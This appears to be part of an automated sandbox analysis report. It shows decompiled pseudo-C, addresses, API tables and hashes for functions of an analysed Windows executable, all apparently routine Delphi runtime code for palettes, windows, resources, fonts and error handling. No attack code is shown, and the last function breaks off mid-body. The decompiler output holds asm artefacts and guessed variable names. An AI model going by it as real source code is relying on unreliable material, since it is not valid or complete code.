				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x24))();
					_t39 = 0;
					if(_t36 != 0) {
						_t39 = SelectPalette(E0041FDC4(__edx), _t36, 0xffffffff);
						RealizePalette(E0041FDC4(_t33));
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t35 = _t33;
					_t38 = _t36;
					_v32.right = _v32.right - 1;
					_v32.bottom = _v32.bottom - 1;
					_t11 = PlayEnhMetaFile(E0041FDC4(_t35),  *( *((intOrPtr*)(_t29 + 0x28)) + 8),  &_v32);
					if(_t38 != 0) {
						return SelectPalette(E0041FDC4(_t35), _t39, 0xffffffff);
					}
				}
				return _t11;
			}











                                                                                0x00421fdc
                                                                                0x00421fe3
                                                                                0x00421fe6
                                                                                0x00421fe8
                                                                                0x00421fee
                                                                                0x00421ff7
                                                                                0x00421ff9
                                                                                0x00421ffd
                                                                                0x0042200f
                                                                                0x00422019
                                                                                0x00422019
                                                                                0x00422029
                                                                                0x0042202a
                                                                                0x0042202b
                                                                                0x0042202c
                                                                                0x0042202d
                                                                                0x0042202e
                                                                                0x0042202f
                                                                                0x00422033
                                                                                0x0042204b
                                                                                0x00422052
                                                                                0x00000000
                                                                                0x0042205f
                                                                                0x00422052
                                                                                0x0042206b

                                                                                APIs
                                                                                • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042200A
                                                                                • RealizePalette.GDI32(00000000), ref: 00422019
                                                                                • PlayEnhMetaFile.GDI32(00000000,?,?), ref: 0042204B
                                                                                • SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042205F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Palette$Select$FileMetaPlayRealize
                                                                                • String ID:
                                                                                • API String ID: 1995988871-0
                                                                                • Opcode ID: f15c074b92c496038122854ebc95fcd552bcea9610ee8adc800de6ad237f33db
                                                                                • Instruction ID: f4c557c1bb24d42774a62b44b8927d735ce660dfbc53d9c91e84fbf4e2c165a0
                                                                                • Opcode Fuzzy Hash: f15c074b92c496038122854ebc95fcd552bcea9610ee8adc800de6ad237f33db
                                                                                • Instruction Fuzzy Hash: 7101A5716042206BC610BA69DC449ABB3ED9F85338F05063BF919EB382D679DC45C6E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004545F8, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004545F8(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x487bfc; // 0x22e1310
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00454588, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E00413FA4( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                                                                0x004545fa
                                                                                0x004545fd
                                                                                0x004545ff
                                                                                0x00454608
                                                                                0x00454615
                                                                                0x0045461e
                                                                                0x00454621
                                                                                0x0045462d
                                                                                0x00454632
                                                                                0x00454632
                                                                                0x0045463c
                                                                                0x0045464a
                                                                                0x0045464c
                                                                                0x00454659
                                                                                0x0045465b
                                                                                0x0045465b
                                                                                0x00454662
                                                                                0x00454662
                                                                                0x0045466b
                                                                                0x0045466f
                                                                                0x00454671
                                                                                0x00454685
                                                                                0x00454691
                                                                                0x00454696
                                                                                0x00454697
                                                                                0x00454671
                                                                                0x0045466f
                                                                                0x0045463c
                                                                                0x0045469c
                                                                                0x0045469c
                                                                                0x004546a6

                                                                                APIs
                                                                                • EnumWindows.USER32(00454588), ref: 0045462D
                                                                                • GetWindow.USER32(00000003,00000003), ref: 00454645
                                                                                • GetWindowLongA.USER32 ref: 00454652
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00454691
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$EnumLongWindows
                                                                                • String ID:
                                                                                • API String ID: 4191631535-0
                                                                                • Opcode ID: 54b30549b5890034c280d358ad55b6b187d1585eb2e61102c1a7ec289f303aab
                                                                                • Instruction ID: 5cb2c35cb50d504b52006ad56c3c00fd2761b840e39f3ce058a847bbcc87ac37
                                                                                • Opcode Fuzzy Hash: 54b30549b5890034c280d358ad55b6b187d1585eb2e61102c1a7ec289f303aab
                                                                                • Instruction Fuzzy Hash: C1119E70604200AFDB10AA68CC85F9673A8AB85729F15027AFD58AF2D3C3789C85CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004168F4, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E004168F4(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00416884(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x416694
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00416884(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x416694
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x4161c0
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416654(_t23, _t25, _t18);
			}

















                                                                                0x004168fb
                                                                                0x004168fe
                                                                                0x00416900
                                                                                0x00416910
                                                                                0x00416912
                                                                                0x00416915
                                                                                0x00416917
                                                                                0x0041691a
                                                                                0x0041691f
                                                                                0x0041691f
                                                                                0x00416920
                                                                                0x0041692a
                                                                                0x0041692c
                                                                                0x0041692f
                                                                                0x00416931
                                                                                0x00416934
                                                                                0x00416939
                                                                                0x0041693a
                                                                                0x00416944
                                                                                0x00416945
                                                                                0x00416949
                                                                                0x00416952
                                                                                0x0041695d

                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 0041690B
                                                                                • LoadResource.KERNEL32(?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 00416925
                                                                                • SizeofResource.KERNEL32(?,00416694,?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 0041693F
                                                                                • LockResource.KERNEL32(004161C0,00000000,?,00416694,?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 00416949
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: e58589db6cc9c2ed489951130424e2c568b54bd93535f2053440df7c87e29db1
                                                                                • Instruction ID: 6a59b26ac78e4b5b86669d74dbecf5df281273e363dea241552c74f923b8e910
                                                                                • Opcode Fuzzy Hash: e58589db6cc9c2ed489951130424e2c568b54bd93535f2053440df7c87e29db1
                                                                                • Instruction Fuzzy Hash: 63F06DB36022046F9708EF6DA881D9B77DCEE993A4312016FF90CD7206DA38DD5183B8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040889C, Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040889C(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E00404588( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}








                                                                                0x0040889d
                                                                                0x004088a0
                                                                                0x004088bc
                                                                                0x004088b3
                                                                                0x00000000
                                                                                0x004088b5
                                                                                0x004088b5
                                                                                0x004088b5
                                                                                0x004088fb
                                                                                0x004088fe
                                                                                0x004088fe
                                                                                0x004088c9
                                                                                0x004088d8
                                                                                0x004088e0
                                                                                0x004088e6
                                                                                0x004088f4
                                                                                0x004088f9
                                                                                0x00000000

                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 004088AC
                                                                                • GetLastError.KERNEL32(?,?), ref: 004088B5
                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 004088C9
                                                                                • FileTimeToDosDateTime.KERNEL32 ref: 004088D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                • String ID:
                                                                                • API String ID: 2103556486-0
                                                                                • Opcode ID: faf4f9093bdd09ba35a4a8d2195ad12253dd24e254ffb0e310f1718714673121
                                                                                • Instruction ID: dd138b2cbfea1a41325b38cdf14aeadd6a2b6169d3a22f7e4d744e8d557f4554
                                                                                • Opcode Fuzzy Hash: faf4f9093bdd09ba35a4a8d2195ad12253dd24e254ffb0e310f1718714673121
                                                                                • Instruction Fuzzy Hash: 92F062B35002009FDB04FFA5C9C288733ACEB4431475084BBED05EB286EA38D51487B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453F14, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00453F14(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x487bfc; // 0x22e1310
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x487c14 == 0) {
						_t2 = SetWindowsHookExA(3, E00453ED0, 0, GetCurrentThreadId());
						 *0x487c14 = _t2;
					}
					if( *0x487c10 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x487c10 = _t2;
					}
					if( *0x487c18 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00453E74, 0, 0, _t7);
						 *0x487c18 = _t2;
					}
				}
				return _t2;
			}





                                                                                0x00453f15
                                                                                0x00453f21
                                                                                0x00453f2a
                                                                                0x00453f3c
                                                                                0x00453f41
                                                                                0x00453f41
                                                                                0x00453f4d
                                                                                0x00453f57
                                                                                0x00453f5c
                                                                                0x00453f5c
                                                                                0x00453f68
                                                                                0x00453f7b
                                                                                0x00453f80
                                                                                0x00453f80
                                                                                0x00453f68
                                                                                0x00453f86

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453F2C
                                                                                • SetWindowsHookExA.USER32 ref: 00453F3C
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453F57
                                                                                • CreateThread.KERNEL32(00000000,000003E8,00453E74,00000000,00000000), ref: 00453F7B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateThread$CurrentEventHookWindows
                                                                                • String ID:
                                                                                • API String ID: 1195359707-0
                                                                                • Opcode ID: 0444d7c6d4168982272ff5612d8d20d92426553b9994da3837f237603c9db872
                                                                                • Instruction ID: e28856fd365dcb9ea9107fa12257fb98ca3ea3d1382ea9896caf25c5995a26e3
                                                                                • Opcode Fuzzy Hash: 0444d7c6d4168982272ff5612d8d20d92426553b9994da3837f237603c9db872
                                                                                • Instruction Fuzzy Hash: F6F03071B8D300AEF7106B659D57F1A25A4A310B97F201C7EF6046A1D2C7B85AC487AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423690, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 49%
                                                                                			E00423690(void* __eflags) {
				int _t14;
				intOrPtr _t20;
				void* _t21;

				DeleteObject( *(_t21 - 0x10));
				E00403DA8();
				E00403DFC();
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4236e1);
				DeleteDC( *(_t21 - 0x1c));
				_t14 = ReleaseDC(0,  *(_t21 - 0x18));
				if( *(_t21 - 0x10) != 0) {
					return GetObjectA( *(_t21 - 0x10), 0x54,  *(_t21 + 0xc));
				}
				return _t14;
			}






                                                                                0x00423694
                                                                                0x00423699
                                                                                0x0042369e
                                                                                0x004236a5
                                                                                0x004236a8
                                                                                0x004236ab
                                                                                0x004236b4
                                                                                0x004236bf
                                                                                0x004236c8
                                                                                0x00000000
                                                                                0x004236d4
                                                                                0x004236d9

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DeleteObject$Release
                                                                                • String ID:
                                                                                • API String ID: 2600533906-0
                                                                                • Opcode ID: ac684a19cf7d03bdfc4d5038e7ab89f884e0849e1027b05f98d6bf5ae10dfc53
                                                                                • Instruction ID: 3429551c4f657d278ba83dca6c20dc1383fca88764dbb818c78fe85dd7b7e0e0
                                                                                • Opcode Fuzzy Hash: ac684a19cf7d03bdfc4d5038e7ab89f884e0849e1027b05f98d6bf5ae10dfc53
                                                                                • Instruction Fuzzy Hash: 68E03071B04215AAEB14FBE9D842B7E77BCEF44305F50482AB510E61C1C63CA9108B28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407220, Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407220(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                                                                0x00407223
                                                                                0x0040722a
                                                                                0x0040722f
                                                                                0x00407235
                                                                                0x0040723a

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$AllocHandleWire
                                                                                • String ID:
                                                                                • API String ID: 2210401237-0
                                                                                • Opcode ID: b242d88203f85b8996b776b6ff7dd028c4c5f6cd2c22e953581b3ac5f44f8ee0
                                                                                • Instruction ID: 1a6e8ccd0a1480b6cc6632480fba39d70e8d35f598ec30b1080dd49c18280503
                                                                                • Opcode Fuzzy Hash: b242d88203f85b8996b776b6ff7dd028c4c5f6cd2c22e953581b3ac5f44f8ee0
                                                                                • Instruction Fuzzy Hash: 0EB009D489030439E80433B64E4FE3B002C989070978249BE3442F2882D87CA860803D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041EB60, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E0041EB60(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41ece9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041ECF0);
					return E00404344( &_v80, 3);
				} else {
					_t76 =  *0x487a74; // 0x22e0ad8
					E0041DEE4(_t76);
					_push(_t137);
					_push(0x41ecc1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E0040457C( &_v72, _v8 + 0x1b);
						if(E00408594(_v72, "Default") != 0) {
							E0040457C( &_v80, _v8 + 0x1b);
							E00408BD8( &(_v68.lfFaceName), _v80);
						} else {
							E0040457C( &_v76, "\rMS Sans Serif");
							E00408BD8( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041EE44(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41ecc8);
					_t81 =  *0x487a74; // 0x22e0ad8
					return E0041DEF0(_t81);
				}
			}
















                                                                                0x0041eb61
                                                                                0x0041eb63
                                                                                0x0041eb69
                                                                                0x0041eb6c
                                                                                0x0041eb6f
                                                                                0x0041eb72
                                                                                0x0041eb76
                                                                                0x0041eb77
                                                                                0x0041eb7c
                                                                                0x0041eb7f
                                                                                0x0041eb85
                                                                                0x0041eb8f
                                                                                0x0041ecd3
                                                                                0x0041ecd6
                                                                                0x0041ece8
                                                                                0x0041eb95
                                                                                0x0041eb95
                                                                                0x0041eb9a
                                                                                0x0041eba1
                                                                                0x0041eba2
                                                                                0x0041eba7
                                                                                0x0041ebaa
                                                                                0x0041ebb4
                                                                                0x0041ebc0
                                                                                0x0041ebc5
                                                                                0x0041ebca
                                                                                0x0041ebcf
                                                                                0x0041ebd9
                                                                                0x0041ebe4
                                                                                0x0041ebdb
                                                                                0x0041ebdb
                                                                                0x0041ebdb
                                                                                0x0041ebf5
                                                                                0x0041ec02
                                                                                0x0041ec0f
                                                                                0x0041ec18
                                                                                0x0041ec24
                                                                                0x0041ec38
                                                                                0x0041ec5d
                                                                                0x0041ec68
                                                                                0x0041ec3a
                                                                                0x0041ec42
                                                                                0x0041ec4d
                                                                                0x0041ec4d
                                                                                0x0041ec6d
                                                                                0x0041ec71
                                                                                0x0041ec75
                                                                                0x0041ec80
                                                                                0x0041ec82
                                                                                0x0041ec8a
                                                                                0x0041ec84
                                                                                0x0041ec86
                                                                                0x0041ec90
                                                                                0x0041ec88
                                                                                0x0041ec96
                                                                                0x0041ec96
                                                                                0x0041ec86
                                                                                0x0041eca6
                                                                                0x0041eca6
                                                                                0x0041ecab
                                                                                0x0041ecae
                                                                                0x0041ecb1
                                                                                0x0041ecb6
                                                                                0x0041ecc0
                                                                                0x0041ecc0

                                                                                APIs
                                                                                  • Part of subcall function 0041DEE4: RtlEnterCriticalSection.KERNEL32(?,0041DF21), ref: 0041DEE8
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0041EC9E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateCriticalEnterFontIndirectSection
                                                                                • String ID: MS Sans Serif$Default
                                                                                • API String ID: 2931345757-2137701257
                                                                                • Opcode ID: 003712182c8eaff7deaab1224c24189ed19d4a75f6a5e48ecdcb400a55ac035d
                                                                                • Instruction ID: e60251e722a7b7db74474c537270072edb21ad5dc5872d212219de67613c1dc8
                                                                                • Opcode Fuzzy Hash: 003712182c8eaff7deaab1224c24189ed19d4a75f6a5e48ecdcb400a55ac035d
                                                                                • Instruction Fuzzy Hash: D1516474A04248DFDB01CFA9C981BCDBBF5EF48304F6544AAE800A7352E3389E45DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A4C4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E0040A4C4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a67f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x486c64; // 0x40751c
					E00406520(_t52,  &_v8);
				} else {
					_t86 =  *0x486dd4; // 0x407514
					E00406520(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x486d30; // 0x4074bc
					E00406520(_t60,  &_v372);
					E0040A0EC(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404588( &_v340, 0x105,  &_v297);
					E00408A10(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
